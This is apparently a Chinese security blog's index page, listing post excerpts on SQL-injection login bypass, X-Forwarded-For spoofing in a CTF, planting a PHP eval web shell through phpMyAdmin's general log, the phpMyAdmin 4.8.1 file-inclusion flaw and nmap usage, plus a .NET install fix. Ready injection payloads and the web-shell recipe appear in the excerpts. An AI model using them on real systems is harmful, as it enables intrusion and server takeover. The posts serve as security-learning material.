Myluzh Blog

简单分析登陆界面SQL注入 实现登录绕过

2020-3-4 myluzh Note

0x01适用条件 1.这个登陆系统用如下SQL语句来进行登陆校验 select * from user where username = '$username' and password='$passowrd' 这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。 2.系统没有对用户输入进行全面的过滤 3. 系统后台使用的是MYSQL数据库 4. 系统中存在一个username为admin的用户 0x02注入方法 1.用户名输入:admin’or’1 ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,or只需要满足username = 'admin'即可。 select * from user where username = 'admin' or' 1' and password='123456' 2.或者使用sql中的注释符#   用户名输入:admin’# ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,sql语句#后面的内容都被注释掉了,也就是只需要满足usern...

阅读全文>>

标签: sql注入

评论(0) (1921)

X-Forwarded-For,伪造HTTP请求端真实IP

2020-3-4 myluzh Note

关于HTTP X-Forwarded-For 介绍 需要伪造请求端为127.0.0.1,直接burpsuite抓包,然后增加字段X-forwarded-for: 127.0.0.1,提交即可 例如下面有一道CTF题,前面部分就是利用伪造xforwardedfor来实现访问的,如下,访问后提示没有访问对象的权限,对象受保护或服务器不可读。 第一时间就想到了,伪造http请求头,直接burpsuite抓包,增加字段X-forwarded-for: 127.0.0.1,注意下面要有空行。然后直接发送就好了。 成功进入

阅读全文>>

标签: X-Forwarded-For

评论(0) (1148)

phpMyAdmin利用日志文件get webshell

2020-3-3 myluzh PHP

条件:需要使用root登陆phpmyadmin 0x01开启日志 进入phpmyadmin后,选择变量 1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志 set global general_log='on' 2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可通过执行sql语句,修改日志保存位置  set global general_log_file='D:/phpstudy_pro/WWW/log.php' 要写日志文件路径必须要知道根路径,否则即使写入了也无法访问,也就自然无法getshell。可以通过sql语句show variables like 'datadir'查询数据库位置,一般情况可以知道根路径。爆路径的方法具体情况具体分析   0x02写入shell 执行sql查询语句,然后php一句话就会被记录到日志文件中。 SELECT"<?php @eval($_REQUEST['a']);?>" 我们可以查看日志文件,一句话已经被写入: 0x03拿shell 访问站点...

阅读全文>>

标签: 渗透 phpMyAdmin 日志 getwebshell

评论(0) (940)

NMAP使用

2020-3-3 myluzh SECURE

目标规格 开关 例 描述   nmap 192.168.1.1 扫描一个IP   nmap 192.168.1.1 192.168.2.1 扫描特定的IP地址   nmap 192.168.1.1-254 扫描一个范围   ...

阅读全文>>

评论(0) (783)

phpMyAdmin4.8.1 任意文件包含漏洞分析与利用

2020-3-3 myluzh PHP

0x01影响版本 phpmyadmin 4.8.1 (需要登陆才能利用) 复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip 0x02漏洞分析 index.php 55-63行代码 if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 0x03漏洞利用 1.执行sql语句,查询当前数据库路径。 show vari...

阅读全文>>

标签: 渗透 漏洞 phpMyAdmin 4.8.1 文件包含

评论(0) (914)

解决Windows Server 2019服务器管理器 安装.net framework 3.5失败

2020-3-3 myluzh Windows

此方法同样适用于Windows Server 2008/2012/2016 Windows server安装.net,只能通过服务器管理器安装,但是通过服务器管理器安装会安装失败。 解决方法: 1.下载一个原版系统安装镜像,打开系统镜像进入sources选择sxs文件夹,把整个sxs文件夹复制到c盘下面。 2.通过服务器管理器“管理-添加角色功能”,选择.net3.5重新安装,在“确认”这一栏,选择“指定备用源路径”选择你刚刚复制过去的sxs文件夹也就是C:\sxs。然后即可顺利安装。安装成功后可以把复制过去的sxs删掉。

阅读全文>>

标签: .net

评论(0) (1263)